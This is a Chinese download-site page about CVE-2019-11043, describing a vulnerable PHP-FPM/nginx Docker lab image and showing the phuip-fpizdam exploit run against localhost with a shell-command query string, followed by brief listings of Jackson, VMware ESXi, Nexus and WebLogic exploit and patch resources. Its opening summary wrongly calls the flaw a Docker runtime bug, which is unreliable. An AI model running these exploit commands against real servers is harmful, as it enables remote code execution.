Advertisement

Docker CVE-2019-11043

  •  5星
  •     浏览量: 0
  •     大小:None
  •      文件类型:None


简介:
CVE-2019-11043是针对Docker容器运行时引擎的安全漏洞,该漏洞可能允许攻击者在目标系统上执行任意代码,影响了Docker服务的广泛使用和安全性。 带有易受攻击的PHP-FPM版本(CVE-2019-11043)和nginx的docker映像可以通过以下命令运行:`docker run --rm -p8080:80 akamajoris/cve-2019-11043`。随后,您应该能够通过浏览器访问Web应用程序。 开发人员从相关仓库构建了二进制文件,并执行如下操作: ``` root@debian:~/gopath/bin# curl localhost:8080/?a=/bin/sh+-c+which+which root@debian:~/gopath/bin# ./phuip-fpizdam http://localhost:8080/index.php 2019/10/24 08:53:00 Base status code is 200 2019/10/24 08:53:00 Status... ``` 以上是关于如何使用该docker映像和执行特定命令的说明。

全部评论 (0)

还没有任何评论哟~
客服
客服
  • Docker CVE-2019-11043
    优质
    CVE-2019-11043是针对Docker容器运行时引擎的安全漏洞,该漏洞可能允许攻击者在目标系统上执行任意代码,影响了Docker服务的广泛使用和安全性。 带有易受攻击的PHP-FPM版本(CVE-2019-11043)和nginx的docker映像可以通过以下命令运行:`docker run --rm -p8080:80 akamajoris/cve-2019-11043`。随后,您应该能够通过浏览器访问Web应用程序。 开发人员从相关仓库构建了二进制文件,并执行如下操作: ``` root@debian:~/gopath/bin# curl localhost:8080/?a=/bin/sh+-c+which+which root@debian:~/gopath/bin# ./phuip-fpizdam http://localhost:8080/index.php 2019/10/24 08:53:00 Base status code is 200 2019/10/24 08:53:00 Status... ``` 以上是关于如何使用该docker映像和执行特定命令的说明。
  • Jackson 新漏洞曝光(CVE-2019-14361和CVE-2019-14439)
    优质
    近期,安全研究人员发现并报告了影响Jackson库的两个新漏洞(CVE-2019-14361、CVE-2019-14439),可能让攻击者进行远程代码执行。建议用户尽快更新至最新版本以防护潜在威胁。 Jackson官方GitHub仓库发布了两个安全问题,涉及漏洞CVE-2019-14361和CVE-2019-14439,这两个问题是针对先前的CVE-2019-12384漏洞进行绕过的手段。当用户提交一个精心构造的恶意JSON数据到Web服务器时,可能会导致远程任意代码执行的风险。阿里云应急响应中心建议Jackson的用户尽快采取安全措施来防止此类攻击的发生。
  • VMware ESXi OpenSLP PoCs: CVE-2020-3992与CVE-2019-5544
    优质
    本文探讨了在VMware ESXi中发现的安全漏洞CVE-2020-3992和CVE-2019-5544,分析了OpenSLP服务中的潜在威胁,并提供了概念验证代码以加深理解。 VMware ESXI OpenSLP PoC CVE-2020-3992 和 CVE-2019-5544 在 VMware Workstation 上安装的 ESXi 环境中进行了测试。如果在真实的机器上进行测试,则可能需要更改 srvtype 字段(服务:VMwareInfrastructure)。
  • CVE-2019-7238脚本.py
    优质
    这段Python代码是针对CVE-2019-7238漏洞的利用脚本,旨在帮助安全研究人员测试系统的脆弱性并进行防护措施验证。 CVE-2019-7238 是 Nexus Repository Manager 3 在版本 3.15.0 之前存在的无需认证的远程代码执行漏洞,该漏洞由腾讯安全yun ding实验室和[@voidfyoo](https://twitter.com/voidfyoo)发现。重写后的内容如下: Nexus Repository Manager 3 版本小于 3.15.0 存在一个无需身份验证即可利用的远程代码执行漏洞 (CVE-2019-7238),此漏洞由腾讯安全Yunding实验室和一位名为voidfyoo的安全研究人员发现。
  • CVE-2019-2890漏洞详情
    优质
    CVE-2019-2890为2019年发现的安全漏洞,影响多个Adobe产品。此漏洞允许攻击者通过特制文件执行任意代码,需及时更新补丁以确保安全。 声明仅用于学习交流使用,其他用途后果自负。说明已经将相关jar文件都导入到了项目中,并且利用方式采用yso的JRMP,在学习调试过程中可以修改利用方式。首先需要将weblogic下的SerializedSystemIni.dat文件放置到安全文件夹下。然后需将yso重命名为ysoserial.jar ,并将其导入到lib目录下。接着进入weblogic / wsee / jaxws / persistence / PersistentContext.java中的getObject方法,设置IP地址和端口。 ```java try { var3.writeObject(Poc.getObject(127.0.0.1:8000)); } catch (Exception e) { e.printStackTrace(); } ``` 确保按照上述步骤操作后进行测试。
  • WebLogic CVE-2019-2725修复补丁.zip
    优质
    本资源包包含针对WebLogic Server CVE-2019-2725漏洞的安全更新与修复代码,旨在帮助用户加固系统安全。 WebLogic反序列化补丁包可以用于修复相关安全漏洞。建议定期检查官方发布的更新并安装最新的补丁以确保系统的安全性。
  • Windows 2008 R2 安全补丁 (CVE-2019-0708).7z
    优质
    这是一份针对Windows Server 2008 R2操作系统的安全更新包,修复了编号为CVE-2019-0708的漏洞,能够有效提升系统安全性。建议用户及时安装以防范潜在风险。文件格式为.7z,便于下载和解压使用。 Win2008 R2安全补丁(CVE-2019-0708)包含以下几个补丁:Windows 6.1-KB2868725-x64、Windows 6.1-KB4499175-x64 (3704acfff45ddf163d8049683d5a3b75e49b58cb)、Windows 6.0-KB4499180-x86 (058da885ced3478b996f12d1fc40640c3796bdf3) 和 Windows 6.0-KB4499180-x64 (3d7a9cec11c06caf7a280745eccfa99c2048c4d2)。
  • WebLogic-CVE-2019-2725补丁更新指南.docx
    优质
    本文档为《WebLogic-CVE-2019-2725补丁更新指南》,旨在指导用户如何针对CVE-2019-2725漏洞对WebLogic系统进行安全补丁的安装与更新。 ----------------------------------20191010 ---------------------------- 本方法经本人亲自使用验证,在检查冲突这一步可能需要花费较长时间(大约30分钟),但最终能够成功完成,只要不报错就可以顺利安装补丁。如果遇到冲突,请参考卸载补丁的方法。 特别忠告:在采取任何行动之前,请备份Oracle全目录以确保数据安全。 关于CVE-2019-2725漏洞的相关信息和涉及版本、危害详情,请自行搜索查询 Cve-2019-2725 升级安装开始 步骤一: 创建一个名为 cache_dir 的文件夹,路径为 /Oracle/Middleware/utils/bsu/cache_dir。
  • CVE-2019-2725修复相关的补丁P29694149_10360190115_Generic.zip
    优质
    这是一个针对Oracle数据库服务器中CVE-2019-2725漏洞的修补程序,文件名为P29694149_10360190115_Generic.zip。该补丁旨在修复远程代码执行的安全问题。 关于CVE-2019-2725修复的相关补丁和JDK等内容仅用于学习目的。在安装CVE-2019-2725的补丁过程中所使用的材料,如果将其应用于商业用途并因此产生版权纠纷,则与本人无关。
  • CVE-2019-0708 检测及修复补丁方案
    优质
    本方案详细介绍了针对Windows操作系统中严重的远程代码执行漏洞(CVE-2019-0708)的检测方法与修补策略,帮助用户及时防范安全威胁。 关于CVE-2019-0708的检测与修复补丁,可以寻找官方渠道或可信的安全社区获取相关信息和下载链接。请确保从可靠来源获得补丁以保障系统安全。